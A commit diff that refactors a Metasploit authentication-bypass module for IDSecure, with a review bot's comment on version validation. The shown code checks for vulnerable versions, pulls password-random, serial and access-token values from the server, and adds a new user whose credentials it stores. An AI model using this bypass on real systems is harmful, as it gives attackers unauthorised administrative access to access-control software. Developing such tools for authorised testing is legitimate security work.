
Commit c53e5d3

committed
Code cleanup and added store_valid_credential
added store_valid_credential code cleanup
1 parent 5fa18a6 commit c53e5d3


1 file changed

+12
-23
lines changed


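--- a/modules/auxiliary/admin/http/idsecure_auth_bypass.rb
+++ b/modules/auxiliary/admin/http/idsecure_auth_bypass.rb
@@ -50,23 +50,14 @@ def check
 return CheckCode::Unknown
 end
 
-if res && res.code == 401
-data = res.get_json_document
-version = data['Version']
-if version.nil?
-return CheckCode::Unknown
-else
-print_status('Version retrieved: ' + version)
-end
-
-if Rex::Version.new(version) <= Rex::Version.new('4.7.43.0')
-return CheckCode::Appears
-else
-return CheckCode::Safe
-end
-else
-return CheckCode::Unknown
-end
+return CheckCode::Unknown unless res&.code == 401
+
+data = res.get_json_document
+version = data['Version']
+return CheckCode::Unknown unless !version.nil?
+print_status('Got version: ' + version)
+return CheckCode::Safe unless Rex::Version.new(version) <= Rex::Version.new('4.7.43.0')
+return CheckCode::Appears
 end
 
 def run
@@ -79,8 +70,7 @@ def run
 unless res
 fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
 end
-case res.code
-when 200
+if res.code == 200
 json = res.get_json_document
 if json.key?('passwordRandom') && json.key?('serial')
 password_random = json['passwordRandom']
@@ -115,8 +105,7 @@ def run
 unless res
 fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
 end
-case res.code
-when 200
+if res.code == 200
 json = res.get_json_document
 if json.key?('accessToken')
 access_token = json['accessToken']
@@ -149,10 +138,10 @@ def run
 fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
 end
 
-case res.code
-when 200
+if res.code == 200
 json = res.get_json_document
 if json.key?('code') && json['code'] == 200 && json.key?('error') && json['error'] == 'OK'
+store_valid_credential(user: datastore['NEW_USER'], private: datastore['NEW_PASSWORD'], proof: json)
 print_good("New user '#{datastore['NEW_USER']}:#{datastore['NEW_PASSWORD']}' was successfully added.")
 print_good("Login at: https://#{datastore['RHOSTS']}:#{datastore['RPORT']}/#/login")
 else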
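Review bot: In `check`, the `Version` value parsed from the server's reply reaches `'Got version: ' + version` and `Rex::Version.new(version)` after only a nil test (new lines 57-59), so a non-string or malformed value would most likely raise instead of yielding `CheckCode::Unknown`. The guard can validate the shape and drop the double negative in `unless !version.nil?` at the same time: `return CheckCode::Unknown unless version.is_a?(String) && version.match?(/\A\d+(\.\d+)*\z/)`. The method starts above the hunk, so this assumes `data` is the Hash returned by `get_json_document`; if the body can parse to something other than a Hash, `data['Version']` needs the same care.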
